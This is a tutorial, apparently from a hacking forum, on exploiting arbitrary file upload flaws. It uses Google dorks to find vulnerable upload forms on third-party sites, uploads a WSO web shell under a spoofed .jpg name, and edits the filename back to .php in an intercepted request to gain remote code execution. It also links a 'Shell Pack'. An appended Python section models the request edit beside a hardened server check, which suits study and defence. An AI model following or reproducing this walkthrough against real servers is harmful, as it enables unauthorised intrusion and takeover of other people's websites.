Exploiting Arbitrary File Upload Vulnerabilities


An arbitrary file upload vulnerability is a flaw in an upload handler that lets a malicious user store a file of their own choosing on the server. The usual cause, and the one in this tutorial, is that the application does not validate the uploaded file's type or extension correctly on the server side, so a script can land in a web-accessible directory where the web server will execute it. If you don't know what a web shell or a POST request is, this is probably not the tutorial for you. Used correctly, the flaw leads to a web shell and remote code execution on the host, with all the good or bad things that follow from that.

Requirements

For this tutorial you're going to need Firefox and an add-on called Tamper Data, which pauses an outgoing request and lets you edit its headers and POST body before it leaves the browser. Tamper Data is a legacy add-on that no longer loads in Firefox 57 and later; on a current browser an intercepting proxy such as Burp Suite or OWASP ZAP does the same job, and every step below applies to it unchanged.

You can download it here

Once you have it installed, restart Firefox and you can get started.

Finding Vulnerabilities

First you need a vulnerable upload form. A common way to find candidates is Google dorks: search operators that match pages by URL and page content.

Here’s the example I’ll be using in this tutorial.

Code:

inurl:/upload.php intext:Image Upload

You can write your own dorks or use ones other people have published; the one above is only an example.

Once you’ve found your site, you should be at an upload form.

It should look something like this:

[Screenshot: Arbitrary-File-1]

Testing The Upload Form

First try uploading the shell as a plain .php file, to see whether the form filters uploads at all and you need to continue.

[Screenshot: Arbitrary-File-2]

Code:

Unrecognized image type

Now try uploading the image-format copy instead: the same shell with a spoofed image extension on the end of its name (WSO.php%00.jpg in the example below).

[Screenshot: Arbitrary-File-3]

[Screenshot: Arbitrary-File-4]

Modifying The POST Content

It worked, so now go back, upload again, and this time modify the POST content before it reaches the server.

Go back to the upload form, select the image-format shell, and open Tamper Data from the Tools menu.

It should look something like this:

[Screenshot: Arbitrary-File-5]

Click Start Tamper, then submit the upload.

A popup asks whether you want to continue tampering. When the request it shows is the one carrying the upload form data (the POST to the upload script), leave Continue Tampering checked and click Tamper; let any other requests, such as images and scripts, go through.

[Screenshot: Arbitrary-File-6]

A new window opens, which looks like this:

[Screenshot: Arbitrary-File-7]

The left pane holds the request headers; everything on the right is the POST data, and that is where the file name gets changed.

Find the filename parameter and remove the null byte and the spoofed extension so that only the .php name remains. Change nothing else: the Content-Type line the browser filled in from the .jpg extension stays as it is, and since the server has already accepted it once, that is usually the only thing its check looks at. Here's the example, before and after:

Code:

WSO.php%00.jpg

Code:

WSO.php

[Screenshot: Arbitrary-File-8]

[Screenshot: Arbitrary-File-9]

Click OK and the file should upload. Now all you have to do is find the shell: sometimes you can right-click it on the result page (it shows as a broken image) and copy its address; other times the path is in the page source. The same approach works on many different upload forms, including ones inside administrator panels. Hope you understand; good luck and happy hacking.
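To make clear what the Tamper Data edit actually changes, here is an added example written for this page (it is not code from the original post or from the Tamper Data project). It builds the same multipart POST body in Python, applies the filename edit to the captured body, and feeds the result to an assumed model of the weak server-side check that the steps above defeat, next to a hardened check that ignores everything the client sends. The form field name, the Content-Types, the weak-check logic and the sample bytes are assumptions.

```python
"""Added example, not code from the original post or from Tamper Data:
build the upload POST by hand, apply the same edit Tamper Data is used
for, and feed the result to a model of the weak server-side check the
tutorial defeats and to a hardened check. The form field name, the
weak-check logic, the Content-Types and the sample bytes are assumptions."""
import hashlib

# Constructed stand-in for the shell: a harmless PHP stub, not a real web shell.
SAMPLE_PHP = b"<?php echo 'constructed sample'; ?>"
# Leading bytes of the image types the hardened check allows.
IMAGE_MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png", b"GIF8": "gif"}
REJECT = (None, "Unrecognized image type")   # error string seen in the tutorial


def build_multipart(filename, content_type, data, field="file", boundary="b0"):
    """Build a multipart/form-data body the way a browser does for a file
    input. The browser derives content_type from the local file's extension;
    once the request is paused, both values can be edited independently."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    return head + data + f"\r\n--{boundary}--\r\n".encode()


def tamper_filename(body, old, new):
    """The edit made in Tamper Data's POST pane: rewrite only the filename and
    leave the rest of the request, including Content-Type, as the browser sent it."""
    return body.replace(f'filename="{old}"'.encode(), f'filename="{new}"'.encode(), 1)


def parse_first_part(body):
    """Minimal parser for bodies produced by build_multipart():
    returns (filename, content_type, data) of the first part."""
    delimiter = body.split(b"\r\n", 1)[0]                     # b"--<boundary>"
    part = body.split(delimiter + b"\r\n", 1)[1].split(b"\r\n" + delimiter, 1)[0]
    raw_headers, data = part.split(b"\r\n\r\n", 1)
    headers = dict(line.split(b": ", 1) for line in raw_headers.split(b"\r\n"))
    disposition = headers[b"Content-Disposition"].decode()
    filename = disposition.split('filename="', 1)[1].split('"', 1)[0]
    return filename, headers[b"Content-Type"].decode(), data


def weak_check(filename, content_type, data):
    """Assumed model of the check the tutorial bypasses: it trusts the
    client-supplied Content-Type and stores the file under the client-supplied
    name. Returns (stored_name, None) or (None, error)."""
    if not content_type.startswith("image/"):
        return REJECT
    return filename, None


def hardened_check(filename, content_type, data):
    """Ignore both client-supplied values: identify the type from the file's
    leading bytes and generate the stored name server-side from an allowlist.
    Still store outside the web root or with script execution disabled, since
    a valid image header can be followed by PHP (a polyglot file)."""
    for magic, ext in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return f"{hashlib.sha256(data).hexdigest()[:16]}.{ext}", None
    return REJECT


def demo():
    """The three uploads from the tutorial, as constructed requests."""
    results = {}
    # 1. WSO.php as-is: the browser sends a non-image Content-Type (assumed
    #    application/octet-stream here), so the weak check rejects it.
    body = build_multipart("WSO.php", "application/octet-stream", SAMPLE_PHP)
    results["plain"] = weak_check(*parse_first_part(body))
    # 2. WSO.php%00.jpg: the browser picks image/jpeg from the .jpg extension,
    #    so the same bytes are accepted, but stored under a .jpg name.
    spoofed = build_multipart("WSO.php%00.jpg", "image/jpeg", SAMPLE_PHP)
    results["spoofed"] = weak_check(*parse_first_part(spoofed))
    # 3. The Tamper Data step: same request, filename edited back to WSO.php.
    #    Content-Type is still image/jpeg, so the weak check stores a .php file.
    tampered = tamper_filename(spoofed, "WSO.php%00.jpg", "WSO.php")
    results["tampered"] = weak_check(*parse_first_part(tampered))
    # The hardened check looks at the bytes, not at the name or the header.
    results["hardened"] = hardened_check(*parse_first_part(tampered))
    return results


if __name__ == "__main__":
    for step, outcome in demo().items():
        print(f"{step:9s} -> {outcome}")
```

Running the file prints the outcome of each step: the plain upload is rejected, the spoofed one is stored as WSO.php%00.jpg, the tampered one is stored as WSO.php, and the hardened check rejects all three because the bytes do not start with an image header. Note that the %00 in the spoofed name travels as two literal percent characters; it only becomes a null byte if the server URL-decodes the filename, which this model does not do, and the edit removes it anyway.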

Resources

Shell Pack (Image Format) || Virus Scan

Tamper Data


Video

Note: The previous tutorial has been provided so that you might test your own sites and be aware of your own vulnerabilities. Please do not use this knowledge in a malicious manner. I don’t encourage anyone to do anything illegal, or use such a method on equipment and servers you do not own.

